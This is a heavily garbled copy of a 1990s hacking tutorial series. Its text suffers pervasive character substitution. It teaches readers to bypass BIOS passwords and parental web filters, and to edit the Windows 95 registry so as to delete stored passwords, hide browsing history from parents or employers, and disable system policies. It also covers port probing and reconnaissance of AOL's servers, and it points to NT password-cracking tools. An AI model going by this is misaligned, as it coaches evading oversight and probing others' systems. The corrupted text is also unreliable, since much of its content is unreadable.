Ste. fi<e: ;our <ictim com.uter now ho.efully has the /64S default settings& +ut e<erything back the way they were( with the e'ce.tion of setting it to first check the *: dri<e when booting u.& ))))))))))))))))))))))))))))))) ;ou can get fired warning: 1f you do this wrong( and this is a com.uter you use at work( and you ha<e to go crying to the systems administrator to get your com.uter working again( you had better ha<e a con<incing story& Whate<er you do( don't tell the sysadmin or your boss that :#he Ha..y Hacker made me do it: ))))))))))))))))))))))))))))))) Ste. si': .roceed with the *: dri<e boot disk break?in instructions& 2oes this sound too hairy? Want an easy way to mess with /64S? #here's a .rogram you can run that does it without ha<ing to .lay with your mother board& How to 6ess with /64S 9Boy( 1 sure ho.e you decided to read to the end of this G#6HH before taking solder gun to your motherboard& #here's an easy solution to the /64S .assword .roblem& 1t's a .rogram called 8ill/64S which you can download from htt.:IIwww&koas.&com& !Warning: if 1 were you( 1'd first check out this site using the 7yn' browser( which you can use from 7inu' or your shell account$& "ow su..ose you like to surf the Web but your Win 95 bo' is set u. so some sort of net nanny .rogram restricts access to .laces you would really like to <isit& 2oes this mean you are doomed to li<e in a Brady Hamily world? "o way& #here are se<eral ways to e<ade those .rograms that censor what Web sites you <isit& "ow what 1 am about to discuss is not with the intention of feeding .ornogra.hy to little kids& #he sad fact is that these net censorshi. .rograms ha<e no way of e<aluating e<erything on the Web& So what they do is only

allow access to a relati<ely small number of Web sites& #his kee.s kids form disco<ering many wonderful things on the Web& *s the mother of four( 1 understand how worried .arents can get o<er what their kids encounter on the 1nternet& But these Web censor .rograms are a .oor substitute for s.ending time with your kids so that they learn how to use com.uters res.onsibly and become really dynamite hackers 0m( 1 mean( become res.onsible cybers.ace citi>ens& Besides( these .rograms can all be hacked way to easily& #he first tactic to use with a Web censor .rogram is hit control?alt?delete& #his brings u. the task list& 1f the censorshi. .rogram is on the list( turn it off& Second tactic is to edit the autoe'ec&bat file to delete any mention of the web censor .rogram& #his kee.s it from getting loaded in the first .lace& But what if your .arents !or your boss or s.ouse$ is sa<<y enough to check where you'<e been surfing? ;ou'<e got to get rid of those incriminating records whowing that you'<e been surfing 2ilbert 1t's easy to fi' with "etsca.e& 4.en "etsca.e&ini with either "ote.ad or Word +ad& 1t .robably will be in the directory /:T"etsca.eTnetsca.e&ini& "ear the bottom you will find your 057 history& 2elete those lines& But 1nternet 3'.lorer is a really tough browser to defeat& 3diting the 5egistry is the only way !that 1 ha<e found( at least$ to defeat the censorshi. feature on 1nternet 3'.lorer& *nd( guess what( it e<en hides se<eral records of your browsing history in the 5egistry& Brrrr ))))))))))))))))))))))))) "ewbie note: 5egistry 1t is the Calhalla of those who wish to crack Windows& Whoe<er controls the 5egistry of a network ser<er controls the network ?? totally& Whoe<er controls the 5egistry of a Win 95 or Win "# bo' controls that com.uter ?? totally& #he ability to edit the 5egistry is com.arable to ha<ing root access to a 0ni' machine& 'em How to edit the 5egistry: Ste. >ero: Back u. all your files& Ha<e a boot disk handy& 1f you mess u. the 5egistry badly enough you may ha<e to reinstall your o.erating system&

)))))))))))))))))))))))))))))) ;ou can get fired warning: 1f you edit the 5egistry of a com.uter at work( if you get caught you had better ha<e a good e'.lanation for the sysadmin and your boss& Higure out how to edit the 5egistry of a 7*" ser<er at work and you may be in real trouble& ))))))))))))))))))))))))))))))) ))))))))))))))))))))))))))))))) ;ou can go to =ail warning: 6ess with the 5egistry of someone else's com.uter and you may be <iolating the law& Get .ermission before you mess with 5egistries of com.uters you don't own& ))))))))))))))))))))))))))))))) Ste. one: Hind the 5egistry& #his is not sim.le( because the 6icrosoft theory is what you don't know won't hurt you& So the idea is to hide the 5egistry from clueless ty.es& But( hey( we don't care if we totally trash our com.uters( right? So we click Start( then +rograms( then Windows 3'.lorer( then click on the Windows directory and look for a file named :5egedit&e'e&: Ste. two: 5un 5egedit& /lick on it& 1t brings u. se<eral folders: H83;F/7*SS3SF544# H83;F/0553"#F0S35 H83;F74/*7F6*/H1"3 H83;F0S35S H83;F/0553"#F/4"H1G H83;F2;"F2*#* What we are looking at is in some ways like a .assword file( but it's much more than this& 1t holds all sorts of settings ?? how your desk to. looks( what short cuts you are using( what files you are allowed to access& 1f you are used to 0ni'( you are going to ha<e to make ma=or re<isions in how you <iew file .ermissions and .asswords& But( hey( this is a beginners' lesson so we'll gloss o<er this .art& )))))))))))))))))))))))))))) 3<il genius ti.: ;ou can run 5egedit from 24S from a boot disk& Cerrrry handy in certain situations&&& ))))))))))))))))))))))))))))

Ste. three& Get into one of these H83; thingies& 7et's check out /0553"#F0S35 by clicking the .lus sign to the left of it& +lay around awhile& See how the 5egedit gi<es you menu choices to .ick new settings& ;ou'll soon reali>e that 6icrosoft is babysitting you& *ll you see is .ictures with no clue of who these files look in 24S& 1t's called :security by obscurity&: #his isn't how hackers edit the 5egistry& Ste. four& "ow we get act like real hackers& We are going to .ut .art of the 5egistry where we can see ?? and change ?? anything& Hirst click the H83;F/7*SS3SF544# line to highlight it& #hen go u. to the 5egistry heading on the 5egedit menu bar& /lick it( then choose :3'.ort 5egistry Hile&: Gi<e it any name you want( but be sure it ends with :&reg:& Ste. fi<e& 4.en that .art of the 5egistry in Word +ad& 1t is im.ortant to use that .rogram instead of "ote +ad or any other word .rocessing .rogram& 4ne way is to right click on it from 3'.lorer& 16+45#*"# W*5"1"G: if you left click on it( it will automatically im.ort it back into the 5egistry& 1f you were messing with it and accidentally left click( you could trash your com.uter big time& Ste. si': 5ead e<erything you e<er wanted to know about Windows security that 6icrosoft was afraid to let you find out& #hings that look like: YH83;F/7*SS3SF544#Thtmlctl&+assword/tlT/urCerZ JW:htmlctl&+assword/tl&,: YH83;F/7*SS3SF544#Thtmlctl&+assword/tl&,Z JW:+assword/tl 4b=ect: YH83;F/7*SS3SF544#Thtmlctl&+assword/tl&,T/7S12Z JW:[33-%MDEM?5*5H?,,/H?DB,,?MM**MM/MM9M%\: #he stuff inside the brackets in this last line is an encry.ted .assword controlling access to a .rogram or features of a .rogram such as the net censorshi. feature of 1nternet 3'.lorer& What it does in encry.t the .assword when you enter it( then com.are it with the unencry.ted <ersion on file& Ste. se<en: 1t isn't real ob<ious which .assword goes to what .rogram& 1 say delete them all 4f course this means your stored .asswords for logging on to your 1S+( for e'am.le( may disa..ear& *lso( 1nternet 3'.lorer will .o. u. with a warning that :/ontent *d<isor configuration information is missing&

Someone may ha<e tried to tam.er with it&: #his will look really bad to your .arents *lso( if you trash your o.erating system in the .rocess( you'd better ha<e a good e'.lanation for your 6om and 2ad about why your com.uter is so sick& 1t's a good idea to know how to use your boot disk to reinstall Win 95 it this doesn't work out& Ste. eight !o.tional$: Want to erase your surfing records? Hor 1nternet 3'.lorer you'll ha<e to edit H83;F/0553"#F0S35( H83;F74/*7F6*/H1"3 and H83;F0S35S& ;ou can also delete the files c:TwindowsTcookiesTmm-MGD&dat and c:TwindowsTcookiesTmm-5E&dat& #hese also store 057 data& Ste. nine& 1m.ort your &reg files back into the 5egistry& 3ither click on your &reg files in 3'.lorer or else use the :1m.ort: feature ne't to the :3'.ort: you =ust used in 5egedit& #his only works if you remembered to name them with the &reg e'tension& Ste. nine: 4h( no( 1nternet 3'.lorer makes this loud obno'ious noise the first time 1 run it and .uts u. a bright red :U: with the message that 1 tam.ered with the net nanny feature 6y .arents will seriously kill me 4r( worse yet( oh( no( 1 trashed my com.uter *ll is not lost& 3rase the 5egistry and its backu.s& #hese are in four files: system&dat( user&dat( and their backu.s( system&daM and user&daM& ;our o.erating system will immediately commit suicide& !#his was a really e'citing test( folks( but 1 luuu< that adrenaline $ 1f you get cold feet( the 5ecycle bin still works after trashing your 5egistry files( so you can restore them and your com.uter will be back to the mess you =ust made of it& But if you really ha<e guts( =ust kill those files and shut it down& #hen use your Win 95 boot disk to bring your com.uter back to life& 5einstall Windows 95& 1f your desk to. looks different( .roudly tell e<eryone you learned a whole big bunch about Win 95 and decided to .ractice on how your desk to. looks& Ho.e they don't check 1nternet 3'.lorer to see if the censorshi. .rogram still is enabled& *nd if your .arents catch you surfing a "a>i e'.losi<es instruction site( or if you catch your kids at bianca's Smut Shack( don't blame it on Ha..y Hacker&

Blame it on 6icrosoft security ?? or on .arents being too busy to teach their kids right from wrong& So why( instead of ha<ing you edit the 5egistry( didn't 1 =ust tell you to delete those four files and reinstall Win 95? 1t's because if you are e<en halfway serious about hacking( you need to learn how to edit the 5egistry of a Win "# com.uter& ;ou =ust got a little taste of what it will be like here( done on the safety of your home com.uter& ;ou also may ha<e gotten a taste of how easy it is to make a huge mess when messing with the 5egistry& "ow you don't ha<e to take my work for it( you know first hand how disastrous a clumsy hacker can be when messing in someone else's com.uter systems& So what is the bottom line on Windows 95 security? 1s there any way to set u. a Win 95 bo' so no one can break into it? Hey( how about that little key on your com.uter? Sorry( that won't do much good( either& 1t's easy to disconnect so you can still boot the bo'& Sorry( Win 95 is totally <ulnerable& 1n fact( if you ha<e .hysical access to )*";) com.uter( the only way to kee. you from breaking into it is to encry.t its files with a strong encry.tion algorithm& 1t doesn't matter what kind of com.uter it is( files on any com.uter can one way or another be read by someone with .hysical access to it ?? unless they are encry.ted with a strong algorithm such as 5S*& We ha<en't gone into all the ways to break into a Win 95 bo' remotely( but there are .lenty of ways& *ny Win 95 bo' on a network is <ulnerable( unless you encry.t its information& *nd the ways to e<ade Web censor .rograms are so many( the only way you can make them work is to either ho.e your kids stay dumb( or else that they will <oluntarily choose to fill their minds with worthwhile material& Sorry( there is no technological substitute for bringing u. your kids to know right from wrong& )))))))))))))))))))))))))))))) 3<il Genius ti.: Want to trash most of the .olicies can be in<oked on a workstation running Windows 95? +aste these into the a..ro.riate locations in the 5egistry& Warning: results may <ary and you may get into all sorts of trouble whether you do this successfully or unsuccessfully&

YH83;F74/*7F6*/H1"3T"etworkT7ogonZ YH83;F74/*7F6*/H1"3T"etworkT7ogonZ :6ustBeCalidated:Wdword:MMMMMMMM :username:W:Byte6e: :0ser+rofiles:Wdword:MMMMMMMM YH83;F/0553"#F0S35TSoftwareT6icrosoftTWindowsT/urrentCersionT+o liciesZ :2isable+wd/aching:Wdword:MMMMMMMM :HideShare+wds:Wdword:MMMMMMMM YH83;F/0553"#F0S35TSoftwareT6icrosoftTWindowsT/urrentCersionT+o liciesT3'.lorerZ :"o2ri<es:Wdword:MMMMMMMM :"o/lose:Wdword:MMMMMMMM :"o2eskto.:Wdword:MMMMMMMM :"oHind:Wdword:MMMMMMMM :"o"etHood:Wdword:MMMMMMMM :"o5un:Wdword:MMMMMMMM :"oSa<eSettings:Wdword:MMMMMMMM :"o5un:Wdword:MMMMMMMM :"oSa<eSettings:Wdword:MMMMMMMM :"oSetHolders:Wdword:MMMMMMMM :"oSet#askbar:Wdword:MMMMMMMM :"o*dd+rinter:Wdword:MMMMMMMM :"o2elete+rinter:Wdword:MMMMMMMM :"o+rinter#abs:Wdword:MMMMMMMM YH83;F/0553"#F0S35TSoftwareT6icrosoftTWindowsT/urrentCersionT+o liciesT"etworkZ :"o"etSetu.:Wdword:MMMMMMMM :"o"etSetu.12+age:Wdword:MMMMMMMM :"o"etSetu.Security+age:Wdword:MMMMMMMM :"o3ntire"etwork:Wdword:MMMMMMMM :"oHileSharing/ontrol:Wdword:MMMMMMMM :"o+rintSharing/ontrol:Wdword:MMMMMMMM :"oWorkgrou./ontents:Wdword:MMMMMMMM

YH83;F/0553"#F0S35TSoftwareT6icrosoftTWindowsT/urrentCersionT+o liciesTSystemZ YH83;F/0553"#F0S35TSoftwareT6icrosoftTWindowsT/urrentCersionT+o liciesTSystemZ :"o*dmin+age:Wdword:MMMMMMMM :"o/onfig+age:Wdword:MMMMMMMM :"o2e<6gr+age:Wdword:MMMMMMMM :"o2is.*..earance+age:Wdword:MMMMMMMM :"o2is.Background+age:Wdword:MMMMMMMM :"o2is./+7:Wdword:MMMMMMMM :"o2is.ScrSa<+age:Wdword:MMMMMMMM :"o2is.Settings+age:Wdword:MMMMMMMM :"oHileSys+age:Wdword:MMMMMMMM :"o+rofile+age:Wdword:MMMMMMMM :"o+wd+age:Wdword:MMMMMMMM :"oSec/+7:Wdword:MMMMMMMM :"oCirt6em+age:Wdword:MMMMMMMM :2isable5egistry#ools:Wdword:MMMMMMMM YH83;F/0553"#F0S35TSoftwareT6icrosoftTWindowsT/urrentCersionT+o liciesTWin4ld*.. Y3"2 of message te'tZ Y*lready at end of messageZ +1"3 %&9, 63SS*G3 #3U# Holder: 1"B4U 6essage ,KD of G%% 3"2 YH83;F/0553"#F0S35TSoftwareT6icrosoftTWindowsT/urrentCersionT+o liciesTWin4ld*.. Z :2isabled:Wdword:MMMMMMMM :"o5eal6ode:Wdword:MMMMMMMM G0123 #4 !mostly$ H*5673SS H*/81"G Beginners' Series 9-( Section %&

Hacking from Windows %&'( 95 and "# FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF #his lesson will tell you how( armed with e<en the lamest of on?line ser<ices such as *merica 4nline and the Windows 95 o.erating system( you can do some fairly serious 1nternet hacking ?? today 1n this lesson we will learn how to: L 0se secret Windows 95 24S commands to track down and .ort surf com.uters used by famous on?line ser<ice .ro<iders& L #elnet to com.uters that will let you use the in<aluable hacker tools of whois( nslooku.( and dig& L 2ownload hacker tools such as .ort scanners and .assword crackers designed for use with Windows& L 0se 1nternet 3'.lorer to e<ade restrictions on what .rograms you can run on your school or work com.uters& ;es( 1 can hear =ericho and 5ogue *gent and all the other Su.er 2u.er hackers on this list laughing& 1'll bet already they ha<e @uit reading this and are furiously emailing me flames and making .hun of me in -EMM meetings& Windows hacking? +ooh #ell seasoned hackers that you use Windows and they will laugh at you& #hey'll tell you to go away and don't come back until you're armed with a shell account or some sort of 0ni' on your +/& *ctually( 1 ha<e long shared their o.inion& Shoot( most of the time hacking from Windo>e is like using a ,9E9 Colkswagon to race against a dragster using one of C+ 5acing's high? tech fuels& But there actually is a good reason to learn to hack from Windows& Some of your best tools for .robing and mani.ulating Windows networks are found only on Windows "#& Hurthermore( with Win 95 you can .ractice the 5egistry hacking that is central to working your will on Win "# ser<ers and the networks they administer& 1n fact( if you want to become a serious hacker( you e<entually will ha<e to learn Windows& #his is because Windows "# is fast taking o<er the 1nternet from 0ni'& *n 12/ re.ort .ro=ects that the 0ni'?based Web ser<er market share will fall from the E5P of ,995 to only -5P by the year -MMM& #he Windows "# share is .ro=ected to grow to %-P& #his weak future for 0ni'

Web ser<ers is reinforced by an 12/ re.ort re.orting that market share of all 0ni' systems is now falling at a com.ound annual rate of decline of ?,KP for the foreseeable future( while Windows "# is growing in market share by -MP .er year& !6ark Winther( :#he Global 6arket for +ublic and +ri<ate 1nternet Ser<er Software(: 12/ 9,,-M-( *.ril ,99E( ,M( ,,&$ So if you want to kee. u. your hacking skills( you're going to ha<e to get wise to Windows& 4ne of these days we're going to be sniggering at all those 0ni'?only hackers& Besides( e<en .oor( .itiful Windows 95 now can take ad<antage of lots of free hacker tools that gi<e it much of the .ower of 0ni'& Since this is a beginners' lesson( we'll go straight to the Big Suestion: :*ll 1 got is *47 and a Win 95 bo'& /an 1 still learn how to hack?: ;es( yes( yes #he secret to hacking from *47IWin 95 ?? or from any on?line ser<ice that gi<es you access to the World Wide Web ?? is hidden in Win 95's 6S?24S !24S K&M$& 24S K&M offers se<eral 1nternet tools( none of which are documented in either the standard Windows or 24S hel. features& But you're getting the chance to learn these hidden features today& So to get going with today's lesson( use *47 or whate<er lame on?line ser<ice you may ha<e and make the kind of connection you use to get on the Web !this will be a +++ or S71+ connection$& #hen minimi>e your Web browser and .re.are to hack "e't( bring u. your 24S window by clicking Start( then +rograms( then 6S?24S& Hor best hacking 1'<e found it easier to use 24S in a window with a task bar which allows me to cut and .aste commands and easily switch between Windows and 24S .rograms& 1f your 24S comes u. as a full screen( hold down the *lt key while hitting enter( and it will go into a window& #hen if you are missing the task bar( click the system menu on the left side of the 24S window ca.tion and select #oolbar& "ow you ha<e the o.tion of eight #/+I1+ utilities to .lay with: telnet( ar.( ft.( nbtstat( netstat( .ing( route( and tracert&

#elnet is the biggie& ;ou can also access the telnet .rogram directly from Windows& But while hacking you may need the other utilities that can only be used from 24S( so 1 like to call telnet from 24S& With the 24S telnet you can actually .ort surf almost as well as from a 0ni' telnet .rogram& But there are se<eral tricks you need to learn in order to make this work& Hirst( we'll try out logging on to a strange com.uter somewhere& #his is a .hun thing to show your friends who don't ha<e a clue because it can scare the heck out them& Honest( 1 =ust tried this out on a neighbor& He got so worried that when he got home he called my husband and begged him to kee. me from hacking his work com.uter #o do this !1 mean log on to a strange com.uter( not scare your neighbors$ go to the 24S .rom.t /:TW1"24WSV and gi<e the command :telnet&: #his brings u. a telnet screen& /lick on /onnect( then click 5emote System& #his brings u. a bo' that asks you for :Host "ame&: #y.e :whois&internic&net: into this bo'& Below that it asks for :+ort: and has the default <alue of :telnet&: 7ea<e in :telnet: for the .ort selection& Below that is a bo' for :#erm#y.e&: 1 recommend .icking C#,MM because( well( =ust because 1 like it best& #he first thing you can do to frighten your neighbors and im.ress your friends is a :whois&: /lick on /onnect and you will soon get a .rom.t that looks like this: Y<t,MMZ1nter"1/V #hen ask your friend or neighbor his or her email address& #hen at this 1nter"1/ .rom.t( ty.e in the last two .arts of your friend's email address& Hor e'am.le( if the address is :luserJaol&com(: ty.e in :aol&com&: "ow 1'm .icking *47 for this lesson because it is really hard to hack& *lmost any other on?line ser<ice will be easier& Hor *47 we get the answer: Y<t,MMZ 1nter"1/ V whois aol&com

/onnecting to the rs 2atabase & & & & & & /onnected to the rs 2atabase *merica 4nline !*47?246$ ,-,MM Sunrise Calley 2ri<e 5eston( Cirginia --M9, 0S* 2omain "ame: *47&/46 *dministrati<e /ontact: 4'2onnell( 2a<id B !2B4%$ +62*tro.osJ*47&/46 KM%IG5%?G-55 !H*U$ KM%IG5%?G,M#echnical /ontact( Qone /ontact: *merica 4nline !*47?"4/$ troubleJaol&net KM%?G5%?5DEBilling /ontact: Barrett( Roe !RBG%M-$ BarrettRGJ*47&/46 KM%?G5%?G,EM !H*U$ KM%?G5%?GMM, 5ecord last u.dated on ,%?6ar?9K& 5ecord created on --?Run?95& 2omain ser<ers in listed order: 2"S?M,&*47&/46 2"S?M-&*47&/46 2"S?*47&*"S&"3# ,5-&,E%&,99&G,5-&,E%&,99&5E ,9D&D%&-,M&-D

#hese last three lines gi<e the names of some com.uters that work for *merica 4nline !*47$& 1f we want to hack *47( these are a good .lace to start& ))))))))))))))))))))))))))))))))) "ewbie note: We =ust got info on three :domain name ser<ers: for *47& :*ol&com: is the domain name for *47( and the domain ser<ers are the com.uters that hold information that tells the rest of the 1nternet how to send messages to *47 com.uters and email addresses& ))))))))))))))))))))))))))))))))) )))))))))))))))))))))))))))))))))

3<il genius ti.: 0sing your Win 95 and an 1nternet connection( you can run a whois @uery from many other com.uters( as well& #elnet to your target com.uter's .ort G% and if it lets you get on it( gi<e your @uery& 3'am.le: telnet to nic&ddn&mil( .ort G%& 4nce connected ty.e :whois 2"S? M,&*47&/46(: or whate<er name you want to check out& Howe<er( this only works on com.uters that are running the whois ser<ice on .ort G%& Warning: show this trick to your neighbors and they will really be terrified& #hey =ust saw you accessing a 0S military com.uter But it's 48( nic&ddn&mil is o.en to the .ublic on many of its .orts& /heck out its Web site www&nic&ddn&mil and its ft. site( too ?? they are a mother lode of information that is good for hacking& ))))))))))))))))))))))))))))))))) "e't 1 tried a little .ort surfing on 2"S?M,&*47&/46 but couldn't find any .orts o.en& So it's a safe bet this com.uter is behind the *47 firewall& )))))))))))))))))))))))))))))))))) "ewbie note: .ort surfing means to attem.t to access a com.uter through se<eral different .orts& * .ort is any way you get information into or out of a com.uter& Hor e'am.le( .ort -% is the one you usually use to log into a shell account& +ort -5 is used to send email& +ort DM is for the Web& #here are thousands of designated .orts( but any .articular com.uter may be running only three or four .orts& 4n your home com.uter your .orts include the monitor( keyboard( and modem& )))))))))))))))))))))))))))))))))) So what do we do ne't? We close the telnet .rogram and go back to the 24S window& *t the 24S .rom.t we gi<e the command :tracert ,5-&,E%&,99&G-&: 4r we could gi<e the command :tracert 2"S?M,&*47&/46&: 3ither way we'll get the same result& #his command will trace the route that a message takes( ho..ing from one com.uter to another( as it tra<els from my com.uter to this *47 domain ser<er com.uter& Here's what we get: /:TW1"24WSVtracert ,5-&,E%&,99&G#racing route to dns?M,&aol&com Y,5-&,E%&,99&G-Z o<er a ma'imum of %M ho.s: , ) ) ) 5e@uest timed out& - ,5M ms ,GG ms ,%D ms -MG&,%G&KD&-M,

% %K5 ms -99 ms ,9E ms glory?cyber.ort&nm&westnet&net Y-MG&,%G&KD&%%Z G -K, ms ) -M, ms enss%E5&nm&org Y,-9&,-,&,&%Z 5 --9 ms -,E ms -,% ms hG?M&cnss,,E&*lbu@uer@ue&t%&ans&net Y,9-&,M%&KG&G5Z E --% ms -%E ms --9 ms f-&t,,-?M&*lbu@uer@ue&t%&ans&net Y,GM&---&,,-&--,Z K -GD ms -E9 ms -5K ms h,G&tEG?M&Houston&t%&ans&net Y,GM&--%&E5&9Z D ,KD ms -,- ms ,9E ms h,G&tDM?,&St?7ouis&t%&ans&net Y,GM&--%&E5&,GZ 9 %,E ms ) -9D ms h,-&tEM?M&5eston&t%&ans&net Y,GM&--%&E,&9Z ,M %,5 ms %%% ms %%, ms -MK&-5&,%G&,D9 ,, ) ) ) 5e@uest timed out& ,- ) ) ) 5e@uest timed out& ,% -MK&-5&,%G&,D9 re.orts: 2estination net unreachable& What the heck is all this stuff? #he number to the left is the number of com.uters the route has been traced through& #he :,5M ms: stuff is how long( in thousandths of a second( it takes to send a message to and from that com.uter& Since a message can take a different length of time e<ery time you send it( tracert times the tri. three times& #he :): means the tri. was taking too long so tracert said :forget it&: *fter the timing info comes the name of the com.uter the message reached( first in a form that is easy for a human to remember( then in a form ?? numbers ?? that a com.uter .refers& :2estination net unreachable: .robably means tracert hit a firewall& 7et's try the second *47 domain ser<er& /:TW1"24WSVtracert ,5-&,E%&,99&5E #racing route to dns?M-&aol&com Y,5-&,E%&,99&5EZ o<er a ma'imum of %M ho.s: , ) ) ) - ,G- ms ,GM ms % -GE ms ,9G ms Y-MG&,%G&KD&%%Z G ,5G ms ,D5 ms 5 GK5 ms -KD ms Y,9-&,M%&KG& G5Z 5e@uest timed out& ,%K ms -MG&,%G&KD&-M, -G, ms glory?cyber.ort&nm&westnet&net -GK ms enss%E5&nm&org Y,-9&,-,&,&%Z %-5 ms hG?M&cnss,,E&*lbu@uer@ue&t%&ans&net

E ,D, ms ,DK ms -9M ms f-&t,,-?M&*lbu@uer@ue&t%&ans&net Y,GM&---&,,-&-,Z K ,E- ms -,K ms ,99 ms h,G&tEG?M&Houston&t%&ans&net Y,GM&--%&E5&9Z D -,M ms -,- ms -GD ms h,G&tDM?,&St?7ouis&t%&ans&net Y,GM&--%&E5&,GZ 9 -MK ms ) -MD ms h,-&tEM?M&5eston&t%&ans&net Y,GM&--%&E,&9Z ,M %%D ms 5,D ms %D, ms -MK&-5&,%G&,D9 ,, ) ) ) 5e@uest timed out& ,- ) ) ) 5e@uest timed out& ,% -MK&-5&,%G&,D9 re.orts: 2estination net unreachable& "ote that both tracerts ended at the same com.uter named h,-&tEM? M&5eston&t%&ans&net& Since *47 is head@uartered in 5eston( Cirginia( it's a good bet this is a com.uter that directly feeds stuff into *47& But we notice that h,-&tEM?M&5eston&t%&ans&net ( h,G&tDM?,&St?7ouis&t%&ans&net( h,G&tEG? M&Houston&t%&ans&net and *lbu@uer@ue&t%&ans&net all ha<e numerical names beginning with ,GM( and names that end with :ans&net&: So it's a good guess that they all belong to the same com.any& *lso( that :t%: in each name suggests these com.uters are routers on a #% communications backbone for the 1nternet& "e't let's check out that final *47 domain ser<er: /:TW1"24WSVtracert ,9D&D%&-,M&-D #racing route to dns?aol&ans&net Y,9D&D%&-,M&-DZ o<er a ma'imum of %M ho.s: , ) ) ) - ,%D ms ,G5 ms % -,- ms ,9, ms Y-MG&,%G&KD&%%Z G ,EE ms --D ms 5 ,GD ms ,%D ms Y,9-&,M%&KG& G5Z E -DG ms -9E ms Y,GM&---&,,-&-,Z K -9D ms -K9 ms D -%D ms -%G ms 5e@uest timed out& ,%5 ms -MG&,%G&KD&-M, ,D, ms glory?cyber.ort&nm&westnet&net ,D9 ms enss%E5&nm&org Y,-9&,-,&,&%Z ,KK ms hG?M&cnss,,E&*lbu@uer@ue&t%&ans&net ,KD ms f-&t,,-?M&*lbu@uer@ue&t%&ans&net -KK ms h,G&tEG?M&Houston&t%&ans&net Y,GM&--%&E5&9Z -E% ms h,G&t,MG?M&*tlanta&t%&ans&net Y,GM&--%&E5&,DZ

9 %M, ms -5K ms -5M ms dns?aol&ans&net Y,9D&D%&-,M&-DZ #race com.lete& Hey( we finally got all the way through to something we can be .retty certain is an *47 bo'( and it looks like it's outside the firewall But look at how the tracert took a different .ath this time( going through *tlanta instead of St& 7ouis and 5eston& But we are still looking at ans&net addresses with #%s( so this last nameser<er is using the same network as the others& "ow what can we do ne't to get luserJaol&com really wondering if you could actually break into his account? We're going to do some .ort surfing on this last *47 domain name ser<er But to do this we need to change our telnet settings a bit& /lick on #erminal( then +references& 1n the .references bo' you need to check :7ocal echo&: ;ou must do this( or else you won't be able to see e<erything that you get while .ort surfing& Hor some reason( some of the messages a remote com.uter sends to you won't show u. on your Win 95 telnet screen unless you choose the local echo o.tion& Howe<er( be warned( in some situations e<erything you ty.e in will be doubled& Hor e'am.le( if you ty.e in :hello: the telnet screen may show you :heh lelllo o& #his doesn't mean you misty.ed( it =ust means your ty.ing is getting echoed back at <arious inter<als& "ow click on /onnect( then 5emote System& #hen enter the name of that last *47 domain ser<er( dns?aol&ans&net& Below it( for +ort choose 2aytime& 1t will send back to you the day of the week( date and time of day in its time >one& *ha We now know that dns?aol&ans&net is e'.osed to the world( with at least one o.en .ort( heh( heh& 1t is definitely a .ros.ect for further .ort surfing& *nd now your friend is wondering( how did you get something out of that com.uter? )))))))))))))))))))))))))))))) /lueless newbie alert: 1f e<eryone who reads this telnets to the daytime .ort of this com.uter( the sysadmin will say :Whoa( 1'm under hea<y attack by hackers #here must be some e<il e'.loit for the daytime ser<ice 1'm going to close this .ort .ronto : #hen you'll all email me com.laining the hack

doesn't work& +lease( try this hack out on different com.uters and don't all beat u. on *47& )))))))))))))))))))))))))))))) "ow let's check out that 5eston com.uter& 1 select 5emote Host again and enter the name h,-&tEM?M&5eston&t%&ans&net& 1 try some .ort surfing without success& #his is a seriously locked down bo' What do we do ne't? So first we remo<e that :local echo: feature( then we telnet back to whois&internic& We ask about this ans&net outfit that offers links to *47: Y<t,MMZ 1nter"1/ V whois ans&net /onnecting to the rs 2atabase & & & & & & /onnected to the rs 2atabase *"S /4X53 Systems( 1nc& !*"S?246$ ,MM /learbrook 5oad 3lmsford( "; ,M5-% 2omain "ame: *"S&"3# *dministrati<e /ontact: Hershman( 1ttai !1HG$ ittaiJ*"S&"3# !9,G$ KD9?5%%K #echnical /ontact: *"S "etwork 4.erations /enter !*"S?"4/$ nocJans&net ,?DMM?G5E?E%MM Qone /ontact: *"S Hostmaster !*H?45G$ hostmasterJ*"S&"3# !DMM$G5E?E%MM fa': !9,G$KD9?5%,M 5ecord last u.dated on M%?Ran?9K& 5ecord created on -K?Se.?9M& 2omain ser<ers in listed order: "S&*"S&"3# "1S&*"S&"3# ,9-&,M%&E%&,MM ,GK&--5&,&-

"ow if you wanted to be a really e<il hacker you could call that DMM number and try to social engineer a .assword out of somebody who works for this network& But that wouldn't be nice and there is nothing legal you can do with ans&net .asswords& So 1'm not telling you how to social engineer those .asswords& *nyhow( you get the idea of how you can hack around gathering info that leads to the com.uter that handles anyone's email& So what else can you do with your on?line connection and Win 95? Well&&& should 1 tell you about killer .ing? 1t's a good way to lose your =ob and end u. in =ail& ;ou do it from your Windows 24S .rom.t& Hind the gory details in the G#6HH Col&- "umber %( which is ke.t in one of our archi<es listed at the end of this lesson& Hortunately most systems administrators ha<e .atched things nowadays so that killer .ing won't work& But =ust in case your 1S+ or 7*" at work or school isn't .rotected( don't test it without your sysadmin's a..ro<al #hen there's ordinary .ing( also done from 24S& 1t's sort of like tracert( but all it does is time how long a message takes from one com.uter to another( without telling you anything about the com.uters between yours and the one you .ing& 4ther #/+I1+ commands hidden in 24S include: L *r. 1+?to?.hysical address translation tables L Ht. Hile transfer .rotocol& #his one is really lame& 2on't use it& Get a shareware Ht. .rogram from one of the download sites listed below& L "btstat 2is.lays current network info ?? su.er to use on your own 1S+ L "etstat Similar to "bstat L 5oute /ontrols router tables ?? router hacking is considered e'tra elite& Since these are semi?secret commands( you can't get any details on how to use them from the 24S hel. menu& But there are hel. files hidden away for these commands& L Hor ar.( nbtstat( .ing and route( to get hel. =ust ty.e in the command and hit enter& L Hor netstat you ha<e to gi<e the command :netstat ?: to get hel.& L #elnet has a hel. o.tion on the tool bar&

1 ha<en't been able to figure out a trick to get hel. for the ft. command& "ow su..ose you are at the .oint where you want to do serious hacking that re@uires commands other than these we =ust co<ered( but you don't want to use 0ni'& Shame on you But( heck( e<en though 1 usually ha<e one or two 0ni' shell accounts .lus Walnut /reek Slackware on my home com.uter( 1 still like to hack from Windows& #his is because 1'm ornery& So you can be ornery( too& So what is your ne't o.tion for doing serious hacking from Windows? How would you like to crack Win "# ser<er .asswords? 2ownload the free Win 95 .rogram "#7ocksmith( an add?on .rogram to "#5eco<er that allows for the changing of .asswords on systems where the administrati<e .assword has been lost& 1t is re.uted to work ,MMP of the time& Get both "#7ocksmith and "#5eco<er ?? and lots more free hacker tools ?? from htt.:IIwww&ntinternals&com& )))))))))))))))))))))))))))))))))) ;ou can go to =ail warning: 1f you use "#5eco<er to break into someone else's system( you are =ust asking to get busted& )))))))))))))))))))))))))))))))))) How would you like 